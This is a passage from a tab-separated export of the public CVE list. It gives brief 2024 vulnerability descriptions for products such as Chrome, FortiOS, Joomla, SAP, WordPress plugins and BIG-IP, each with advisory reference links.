URL:https://access.redhat.com/errata/RHSA-2024:1386   |   MISC:RHSA-2024:1387   |   URL:https://access.redhat.com/errata/RHSA-2024:1387   |   MISC:RHSA-2024:1388   |   URL:https://access.redhat.com/errata/RHSA-2024:1388   |   MISC:RHSA-2024:1390   |   URL:https://access.redhat.com/errata/RHSA-2024:1390   |   MISC:RHSA-2024:1391   |   URL:https://access.redhat.com/errata/RHSA-2024:1391   |   MISC:RHSA-2024:1392   |   URL:https://access.redhat.com/errata/RHSA-2024:1392   |   MISC:RHSA-2024:1393   |   URL:https://access.redhat.com/errata/RHSA-2024:1393   |   MISC:RHSA-2024:1394   |   URL:https://access.redhat.com/errata/RHSA-2024:1394   |   MISC:https://access.redhat.com/security/cve/CVE-2024-2182   |   URL:https://access.redhat.com/security/cve/CVE-2024-2182   |   MISC:https://mail.openvswitch.org/pipermail/ovs-announce/2024-March/000346.html   |   URL:https://mail.openvswitch.org/pipermail/ovs-announce/2024-March/000346.html   |   MISC:https://www.openwall.com/lists/oss-security/2024/03/12/5   |   URL:https://www.openwall.com/lists/oss-security/2024/03/12/5    Assigned (20240305)
CVE    2024    21816    Candidate    OpenHarmony v4.0.0 and prior versions allow a local attacker to cause an information leak through improper preservation of permissions.    MISC:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-03.md   |   URL:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-03.md    Assigned (20240106)
CVE    2024    21815    Candidate    Insufficiently protected credentials (CWE-522) for third party DVR integrations to the Command Centre Server are accessible to authenticated but unprivileged users. This issue affects: Gallagher Command Centre 9.00 prior to vEL9.00.1774 (MR2), 8.90 prior to vEL8.90.1751 (MR3), 8.80 prior to vEL8.80.1526 (MR4), 8.70 prior to vEL8.70.2526 (MR6), all versions of 8.60 and prior.    MISC:https://security.gallagher.com/Security-Advisories/CVE-2024-21815   |   URL:https://security.gallagher.com/Security-Advisories/CVE-2024-21815    Assigned (20240205)
CVE    2024    21812    Candidate    An integer overflow vulnerability exists in the sopen_FAMOS_read functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .famos file can lead to an out-of-bounds write which in turn can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.    MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1921   |   URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1921    Assigned (20240123)
CVE    2024    21805    Candidate    Improper access control vulnerability exists in the specific folder of SKYSEA Client View versions from Ver.16.100 prior to Ver.19.2. If this vulnerability is exploited, an arbitrary file may be placed in the specific folder by a user who can log in to the PC where the product's Windows client is installed. In case the file is a specially crafted DLL file, arbitrary code may be executed with SYSTEM privilege.    MISC:https://jvn.jp/en/jp/JVN54451757/   |   URL:https://jvn.jp/en/jp/JVN54451757/   |   MISC:https://www.skyseaclientview.net/news/240307_01/   |   URL:https://www.skyseaclientview.net/news/240307_01/    Assigned (20240227)
CVE    2024    21803    Candidate    Use After Free vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (bluetooth modules) allows Local Execution of Code. This vulnerability is associated with program files https://gitee.Com/anolis/cloud-kernel/blob/devel-5.10/net/bluetooth/af_bluetooth.C. This issue affects Linux kernel: from v2.6.12-rc2 before v6.8-rc1.    MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8081   |   URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8081    Assigned (20240115)
CVE    2024    21802    Candidate    A heap-based buffer overflow vulnerability exists in the GGUF library info->ne functionality of llama.cpp Commit 18c2e17. A specially crafted .gguf file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.    MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1914   |   URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1914    Assigned (20240118)
CVE    2024    2180    Candidate    Zemana AntiLogger v2.74.204.664 is vulnerable to a Memory Information Leak vulnerability by triggering the 0x80002020 IOCTL code of the zam64.sys and zamguard64.sys drivers    MISC:https://fluidattacks.com/advisories/gomez/   |   URL:https://fluidattacks.com/advisories/gomez/   |   MISC:https://zemana.com/us/antilogger.html   |   URL:https://zemana.com/us/antilogger.html    Assigned (20240304)
CVE    2024    21798    Candidate    ELECOM wireless LAN routers contain a cross-site scripting vulnerability. Assume that a malicious administrative user configures the affected product with specially crafted content. When another administrative user logs in and operates the product, an arbitrary script may be executed on the web browser. Affected products and versions are as follows: WRC-1167GS2-B v1.67 and earlier, WRC-1167GS2H-B v1.67 and earlier, WRC-2533GS2-B v1.62 and earlier, WRC-2533GS2-W v1.62 and earlier, and WRC-2533GS2V-B v1.62 and earlier.    MISC:https://jvn.jp/en/jp/JVN44166658/   |   URL:https://jvn.jp/en/jp/JVN44166658/   |   MISC:https://www.elecom.co.jp/news/security/20240220-01/   |   URL:https://www.elecom.co.jp/news/security/20240220-01/    Assigned (20240215)
CVE    2024    21796    Candidate    Electronic Deliverables Creation Support Tool (Construction Edition) prior to Ver1.0.4 and Electronic Deliverables Creation Support Tool (Design & Survey Edition) prior to Ver1.0.4 improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.    MISC:https://jvn.jp/en/jp/JVN40049211/   |   URL:https://jvn.jp/en/jp/JVN40049211/   |   MISC:https://www.dfeg.mod.go.jp/hp/contents-dfis/tool.html   |   URL:https://www.dfeg.mod.go.jp/hp/contents-dfis/tool.html    Assigned (20240112)
CVE    2024    21795    Candidate    A heap-based buffer overflow vulnerability exists in the .egi parsing functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .egi file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.    MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1920   |   URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1920    Assigned (20240122)
CVE    2024    21794    Candidate    In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an attacker can redirect users to malicious pages through the login page.    MISC:https://rapidscada.org/contact/   |   URL:https://rapidscada.org/contact/   |   MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03    Assigned (20240105)
CVE    2024    2179    Candidate    Concrete CMS version 9 before 9.2.7 is vulnerable to Stored XSS via the Name field of a Group type since there is insufficient validation of administrator provided data for that field. A rogue administrator could inject malicious code into the Name field which might be executed when users visit the affected page. The Concrete CMS security team gave this vulnerability a CVSS v3.1 score of 2.2 with a vector of AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N. Concrete versions below 9 do not include group types so they are not affected by this vulnerability. Thanks Luca Fuda for reporting.    MISC:https://documentation.concretecms.org/9-x/developers/introduction/version-history/927-release-notes   |   URL:https://documentation.concretecms.org/9-x/developers/introduction/version-history/927-release-notes    Assigned (20240304)
CVE    2024    21789    Candidate    When a BIG-IP ASM/Advanced WAF security policy is configured on a virtual server, undisclosed requests can cause an increase in memory resource utilization. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated    MISC:https://my.f5.com/manage/s/article/K000137270   |   URL:https://my.f5.com/manage/s/article/K000137270    Assigned (20240201)
CVE    2024    21782    Candidate    BIG-IP or BIG-IQ Resource Administrators and Certificate Managers who have access to the secure copy (scp) utility but do not have access to Advanced shell (bash) can execute arbitrary commands with a specially crafted command string. This vulnerability is due to an incomplete fix for CVE-2020-5873. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated    MISC:https://my.f5.com/manage/s/article/K98606833   |   URL:https://my.f5.com/manage/s/article/K98606833    Assigned (20240201)
CVE    2024    21780    Candidate    Stack-based buffer overflow vulnerability exists in HOME SPOT CUBE2 V102 and earlier. Processing a specially crafted command may result in a denial of service (DoS) condition. Note that the affected products are no longer supported.    MISC:https://jvn.jp/en/vu/JVNVU93740658/   |   URL:https://jvn.jp/en/vu/JVNVU93740658/   |   MISC:https://www.au.com/support/service/mobile/guide/wlan/home_spot_cube_2/   |   URL:https://www.au.com/support/service/mobile/guide/wlan/home_spot_cube_2/    Assigned (20240125)
CVE    2024    21775    Candidate    Zoho ManageEngine Exchange Reporter Plus versions 5714 and below are vulnerable to authenticated SQL injection in the report exporting feature.    MISC:https://www.manageengine.com/products/exchange-reports/advisory/CVE-2024-21775.html   |   URL:https://www.manageengine.com/products/exchange-reports/advisory/CVE-2024-21775.html    Assigned (20240111)
CVE    2024    21773    Candidate    Multiple TP-LINK products allow a network-adjacent unauthenticated attacker with access to the product to execute arbitrary OS commands. Affected products/versions are as follows: Archer AX3000 firmware versions prior to "Archer AX3000(JP)_V1_1.1.2 Build 20231115", Archer AX5400 firmware versions prior to "Archer AX5400(JP)_V1_1.1.2 Build 20231115", Deco X50 firmware versions prior to "Deco X50(JP)_V1_1.4.1 Build 20231122", and Deco XE200 firmware versions prior to "Deco XE200(JP)_V1_1.2.5 Build 20231120".    MISC:https://jvn.jp/en/vu/JVNVU91401812/   |   URL:https://jvn.jp/en/vu/JVNVU91401812/   |   MISC:https://www.tp-link.com/jp/support/download/archer-ax3000/#Firmware   |   URL:https://www.tp-link.com/jp/support/download/archer-ax3000/#Firmware   |   MISC:https://www.tp-link.com/jp/support/download/archer-ax5400/#Firmware   |   URL:https://www.tp-link.com/jp/support/download/archer-ax5400/#Firmware   |   MISC:https://www.tp-link.com/jp/support/download/deco-x50/v1/#Firmware   |   URL:https://www.tp-link.com/jp/support/download/deco-x50/v1/#Firmware   |   MISC:https://www.tp-link.com/jp/support/download/deco-xe200/#Firmware   |   URL:https://www.tp-link.com/jp/support/download/deco-xe200/#Firmware    Assigned (20240104)
CVE    2024    21771    Candidate    For unspecified traffic patterns, BIG-IP AFM IPS engine may spend an excessive amount of time matching the traffic against signatures, resulting in Traffic Management Microkernel (TMM) restarting and traffic disruption. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated    MISC:https://my.f5.com/manage/s/article/K000137595   |   URL:https://my.f5.com/manage/s/article/K000137595    Assigned (20240201)
CVE    2024    21767    Candidate    A remote attacker may be able to bypass access control of Commend WS203VICM by creating a malicious request.    MISC:https://clibrary-online.commend.com/en/cyber-security/security-advisories.html   |   URL:https://clibrary-online.commend.com/en/cyber-security/security-advisories.html   |   MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-051-01   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-051-01    Assigned (20240130)
CVE    2024    21765    Candidate    Electronic Delivery Check System (Doboku) Ver.18.1.0 and earlier, Electronic Delivery Check System (Dentsu) Ver.12.1.0 and earlier, Electronic Delivery Check System (Kikai) Ver.10.1.0 and earlier, and Electronic delivery item Inspection Support System Ver.4.0.31 and earlier improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.    MISC:http://www.cals-ed.go.jp/checksys-release-20231130/   |   URL:http://www.cals-ed.go.jp/checksys-release-20231130/   |   MISC:https://jvn.jp/en/jp/JVN77736613/   |   URL:https://jvn.jp/en/jp/JVN77736613/   |   MISC:https://www.ysk.nilim.go.jp/cals/   |   URL:https://www.ysk.nilim.go.jp/cals/    Assigned (20240112)
CVE    2024    21764    Candidate    In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, the product uses hard-coded credentials, which may allow an attacker to connect to a specific port.    MISC:https://rapidscada.org/contact/   |   URL:https://rapidscada.org/contact/   |   MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03    Assigned (20240105)
CVE    2024    21763    Candidate    When BIG-IP AFM Device DoS or DoS profile is configured with NXDOMAIN attack vector and bad actor detection, undisclosed queries can cause the Traffic Management Microkernel (TMM) to terminate. NOTE: Software versions which have reached End of Technical Support (EoTS) are not evaluated    MISC:https://my.f5.com/manage/s/article/K000137521   |   URL:https://my.f5.com/manage/s/article/K000137521    Assigned (20240201)
CVE    2024    21762    Candidate    An out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows an attacker to execute unauthorized code or commands via specifically crafted requests.    MISC:https://fortiguard.com/psirt/FG-IR-24-015   |   URL:https://fortiguard.com/psirt/FG-IR-24-015    Assigned (20240102)
CVE    2024    21761    Candidate    An improper authorization vulnerability [CWE-285] in FortiPortal version 7.2.0, and versions 7.0.6 and below reports may allow a user to download other organizations reports via modification in the request payload.    MISC:https://fortiguard.com/psirt/FG-IR-24-016   |   URL:https://fortiguard.com/psirt/FG-IR-24-016    Assigned (20240102)
CVE    2024    2176    Candidate    Use after free in FedCM in Google Chrome prior to 122.0.6261.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-5dacab5f00   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OYEGSHTMXIPXD5OW5CXVWQS3ZUBCBSXG/   |   MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop.html   |   URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop.html   |   MISC:https://issues.chromium.org/issues/325936438   |   URL:https://issues.chromium.org/issues/325936438    Assigned (20240304)
CVE    2024    21752    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Ernest Marcinko Ajax Search Lite allows Reflected XSS. This issue affects Ajax Search Lite: from n/a through 4.11.4.    MISC:https://patchstack.com/database/vulnerability/ajax-search-lite/wordpress-ajax-search-lite-plugin-4-11-4-reflected-xss-via-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/ajax-search-lite/wordpress-ajax-search-lite-plugin-4-11-4-reflected-xss-via-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240102)
CVE    2024    21750    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scribit Shortcodes Finder allows Reflected XSS. This issue affects Shortcodes Finder: from n/a through 1.5.5.    MISC:https://patchstack.com/database/vulnerability/shortcodes-finder/wordpress-shortcodes-finder-plugin-1-5-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/shortcodes-finder/wordpress-shortcodes-finder-plugin-1-5-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240102)
CVE    2024    21749    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Atakan Au 1 click disable all. This issue affects 1 click disable all: from n/a through 1.0.1.    MISC:https://patchstack.com/database/vulnerability/first-graders-toolbox/wordpress-1-click-disable-all-plugin-1-0-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/first-graders-toolbox/wordpress-1-click-disable-all-plugin-1-0-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240102)
CVE    2024    21747    Candidate    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in weDevs WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting. This issue affects WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting: from n/a through 1.12.8.    MISC:https://patchstack.com/database/vulnerability/erp/wordpress-wp-erp-plugin-1-12-8-sql-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/erp/wordpress-wp-erp-plugin-1-12-8-sql-injection-vulnerability?_s_id=cve    Assigned (20240102)
CVE    2024    21745    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Laybuy Laybuy Payment Extension for WooCommerce allows Stored XSS. This issue affects Laybuy Payment Extension for WooCommerce: from n/a through 5.3.9.    MISC:https://patchstack.com/database/vulnerability/laybuy-gateway-for-woocommerce/wordpress-laybuy-payment-extension-for-woocommerce-plugin-5-3-9-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/laybuy-gateway-for-woocommerce/wordpress-laybuy-payment-extension-for-woocommerce-plugin-5-3-9-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240102)
CVE    2024    21744    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mapster Technology Inc. Mapster WP Maps allows Stored XSS. This issue affects Mapster WP Maps: from n/a through 1.2.38.    MISC:https://patchstack.com/database/vulnerability/mapster-wp-maps/wordpress-mapster-wp-maps-plugin-1-2-38-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/mapster-wp-maps/wordpress-mapster-wp-maps-plugin-1-2-38-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240102)
CVE    2024    21742    Candidate    Improper input validation allows for header injection in MIME4J library when using MIME4J DOM for composing message. This can be exploited by an attacker to add unintended headers to MIME messages.    MISC:https://lists.apache.org/thread/nrqzg93219wdj056pqfszsd33dc54kfy   |   URL:https://lists.apache.org/thread/nrqzg93219wdj056pqfszsd33dc54kfy   |   MLIST:[oss-security] 20240227 CVE-2024-21742: Apache James Mime4J: Mime4J DOM header injection   |   URL:http://www.openwall.com/lists/oss-security/2024/02/27/5    Assigned (20240102)
CVE    2024    2174    Candidate    Inappropriate implementation in V8 in Google Chrome prior to 122.0.6261.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-5dacab5f00   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OYEGSHTMXIPXD5OW5CXVWQS3ZUBCBSXG/   |   MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop.html   |   URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop.html   |   MISC:https://issues.chromium.org/issues/325866363   |   URL:https://issues.chromium.org/issues/325866363    Assigned (20240304)
CVE    2024    21738    Candidate    SAP NetWeaver ABAP Application Server and ABAP Platform do not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. An attacker with low privileges can cause limited impact to confidentiality of the application data after successful exploitation.    MISC:https://me.sap.com/notes/3387737   |   URL:https://me.sap.com/notes/3387737   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240101)
CVE    2024    21737    Candidate    In SAP Application Interface Framework File Adapter - version 702, a high privilege user can use a function module to traverse through various layers and execute OS commands directly. By this, such user can control the behaviour of the application. This leads to considerable impact on confidentiality, integrity and availability.    MISC:https://me.sap.com/notes/3411869   |   URL:https://me.sap.com/notes/3411869   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240101)
CVE    2024    21736    Candidate    SAP S/4HANA Finance for (Advanced Payment Management) - versions SAPSCORE 128, S4CORE 107, does not perform necessary authorization checks. A function import could be triggered allowing the attacker to create in-house bank accounts leading to low impact on the confidentiality of the application.    MISC:https://me.sap.com/notes/3260667   |   URL:https://me.sap.com/notes/3260667   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240101)
CVE    2024    21735    Candidate    SAP LT Replication Server - version S4CORE 103, S4CORE 104, S4CORE 105, S4CORE 106, S4CORE 107, S4CORE 108, does not perform necessary authorization checks. This could allow an attacker with high privileges to perform unintended actions, resulting in escalation of privileges, which has High impact on confidentiality, integrity and availability of the system.    MISC:https://me.sap.com/notes/3407617   |   URL:https://me.sap.com/notes/3407617   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240101)
CVE    2024    21734    Candidate    SAP Marketing (Contacts App) - version 160, allows an attacker with low privileges to trick a user to open malicious page which could lead to a very convincing phishing attack with low impact on confidentiality and integrity of the application.    MISC:https://me.sap.com/notes/3190894   |   URL:https://me.sap.com/notes/3190894   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240101)
CVE    2024    21733    Candidate    Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43. Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.    CONFIRM:https://security.netapp.com/advisory/ntap-20240216-0005/   |   MISC:http://packetstormsecurity.com/files/176951/Apache-Tomcat-8.5.63-9.0.43-HTTP-Response-Smuggling.html   |   MISC:https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz   |   URL:https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz   |   MLIST:[oss-security] 20240119 CVE-2024-21733: Apache Tomcat: Leaking of unrelated request bodies in default error page   |   URL:http://www.openwall.com/lists/oss-security/2024/01/19/2    Assigned (20240101)
CVE    2024    21732    Candidate    FlyCms through abbaa5a allows XSS via the permission management feature.    MISC:https://github.com/Ghostfox2003/cms/blob/main/1.md    Assigned (20240101)
CVE    2024    2173    Candidate    Out of bounds memory access in V8 in Google Chrome prior to 122.0.6261.111 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-5dacab5f00   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OYEGSHTMXIPXD5OW5CXVWQS3ZUBCBSXG/   |   MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop.html   |   URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop.html   |   MISC:https://issues.chromium.org/issues/325893559   |   URL:https://issues.chromium.org/issues/325893559    Assigned (20240304)
CVE    2024    21728    Candidate    An Open Redirect vulnerability was found in osTicky2 below 2.2.8. osTicky (osTicket Bridge) by SmartCalc is a Joomla 3.x extension that provides Joomla frontend integration with osTicket, a popular Support ticket system. The Open Redirect vulnerability allows attackers to control the return parameter in the URL to a base64 malicious URL.    MISC:https://github.com/solracsf/osTicky   |   URL:https://github.com/solracsf/osTicky    Assigned (20240101)
CVE    2024    21727    Candidate    XSS vulnerability in DP Calendar component for Joomla.    MISC:https://extensions.joomla.org/extension/dpcalendar/   |   URL:https://extensions.joomla.org/extension/dpcalendar/    Assigned (20240101)
CVE    2024    21726    Candidate    Inadequate content filtering leads to XSS vulnerabilities in various components.    MISC:https://developer.joomla.org/security-centre/929-20240205-core-inadequate-content-filtering-within-the-filter-code.html   |   URL:https://developer.joomla.org/security-centre/929-20240205-core-inadequate-content-filtering-within-the-filter-code.html    Assigned (20240101)
CVE    2024    21725    Candidate    Inadequate escaping of mail addresses leads to XSS vulnerabilities in various components.    MISC:https://developer.joomla.org/security-centre/928-20240204-core-xss-in-mail-address-outputs.html   |   URL:https://developer.joomla.org/security-centre/928-20240204-core-xss-in-mail-address-outputs.html    Assigned (20240101)
CVE    2024    21724    Candidate    Inadequate input validation for media selection fields leads to XSS vulnerabilities in various extensions.    MISC:https://developer.joomla.org/security-centre/927-20240203-core-xss-in-media-selection-fields.html   |   URL:https://developer.joomla.org/security-centre/927-20240203-core-xss-in-media-selection-fields.html    Assigned (20240101)
CVE    2024    21723    Candidate    Inadequate parsing of URLs could result in an open redirect.    MISC:https://developer.joomla.org/security-centre/926-20240202-core-open-redirect-in-installation-application.html   |   URL:https://developer.joomla.org/security-centre/926-20240202-core-open-redirect-in-installation-application.html    Assigned (20240101)
CVE    2024    21722    Candidate    The MFA management features did not properly terminate existing user sessions when a user's MFA methods have been modified.    MISC:https://developer.joomla.org/security-centre/925-20240201-core-insufficient-session-expiration-in-mfa-management-views.html   |   URL:https://developer.joomla.org/security-centre/925-20240201-core-insufficient-session-expiration-in-mfa-management-views.html    Assigned (20240101)
CVE    2024    2172    Candidate    The Malware Scanner plugin and the Web Application Firewall plugin for WordPress (both by MiniOrange) are vulnerable to privilege escalation due to a missing capability check on the mo_wpns_init() function in all versions up to, and including, 4.7.2 (for Malware Scanner) and 2.1.1 (for Web Application Firewall). This makes it possible for unauthenticated attackers to escalate their privileges to that of an administrator.    MISC:https://plugins.trac.wordpress.org/browser/miniorange-malware-protection/tags/4.7.2/handler/login.php#L89   |   URL:https://plugins.trac.wordpress.org/browser/miniorange-malware-protection/tags/4.7.2/handler/login.php#L89   |   MISC:https://wordpress.org/plugins/miniorange-malware-protection/   |   URL:https://wordpress.org/plugins/miniorange-malware-protection/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6347f588-a3fd-4909-ad57-9d78787b5728?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6347f588-a3fd-4909-ad57-9d78787b5728?source=cve    Assigned (20240304)
CVE    2024    2170    Candidate    The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the child page index widget in all versions up to, and including, 9.96.0.1 due to insufficient input sanitization and output escaping on user supplied attributes such as 'className.' This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3058212%40vk-all-in-one-expansion-unit&new=3058212%40vk-all-in-one-expansion-unit&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3058212%40vk-all-in-one-expansion-unit&new=3058212%40vk-all-in-one-expansion-unit&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1bc697b3-20f6-46df-a250-f2009a60200e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1bc697b3-20f6-46df-a250-f2009a60200e?source=cve    Assigned (20240304)
CVE    2024    2169    Candidate    Implementations of UDP application protocol are vulnerable to network loops. An unauthenticated attacker can use maliciously-crafted packets against a vulnerable implementation that can lead to Denial of Service (DOS) and/or abuse of resources.    CERT-VN:VU#417980   |   URL:https://www.kb.cert.org/vuls/id/417980   |   MISC:https://kb.cert.org/vuls/id/417980   |   URL:https://kb.cert.org/vuls/id/417980    Assigned (20240304)
CVE    2024    21682    Candidate    This High severity Injection vulnerability was introduced in Assets Discovery 1.0 - 6.2.0 (all versions). Assets Discovery, which can be downloaded via Atlassian Marketplace, is a network scanning tool that can be used with or without an agent with Jira Service Management Cloud, Data Center or Server. It detects hardware and software that is connected to your local network and extracts detailed information about each asset. This data can then be imported into Assets in Jira Service Management to help you manage all of the devices and configuration items within your local network. This Injection vulnerability, with a CVSS Score of 7.2, allows an authenticated attacker to modify the actions taken by a system call which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires no user interaction. Atlassian recommends that Assets Discovery customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions See the release notes (https://confluence.atlassian.com/assetapps/assets-discovery-3-2-1-cloud-6-2-1-data_center-1333987182.html). You can download the latest version of Assets Discovery from the Atlassian Marketplace (https://marketplace.atlassian.com/apps/1214668/assets-discovery?hosting=datacenter&tab=installation). This vulnerability was reported via our Penetration Testing program.    MISC:https://confluence.atlassian.com/assetapps/assets-discovery-3-2-1-cloud-6-2-1-data_center-1333987182.html   |   URL:https://confluence.atlassian.com/assetapps/assets-discovery-3-2-1-cloud-6-2-1-data_center-1333987182.html   |   MISC:https://confluence.atlassian.com/pages/viewpage.action?pageId=1354501606   |   URL:https://confluence.atlassian.com/pages/viewpage.action?pageId=1354501606   |   MISC:https://jira.atlassian.com/browse/JSDSERVER-15067   |   URL:https://jira.atlassian.com/browse/JSDSERVER-15067   |   MISC:https://marketplace.atlassian.com/apps/1214668/assets-discovery?hosting=datacenter&tab=installation   |   URL:https://marketplace.atlassian.com/apps/1214668/assets-discovery?hosting=datacenter&tab=installation    Assigned (20240101)
CVE    2024    2168    Candidate    A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/operations/expense_category.php of the component HTTP POST Request Handler. The manipulation of the argument status leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-255678 is the identifier assigned to this vulnerability.    MISC:VDB-255678 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255678   |   MISC:VDB-255678 | SourceCodester Online Tours & Travels Management System HTTP POST Request expense_category.php sql injection   |   URL:https://vuldb.com/?id.255678   |   MISC:https://www.yuque.com/mailemonyeyongjuan/nekc0f/uoobn101h48xv6ih   |   URL:https://www.yuque.com/mailemonyeyongjuan/nekc0f/uoobn101h48xv6ih    Assigned (20240304)
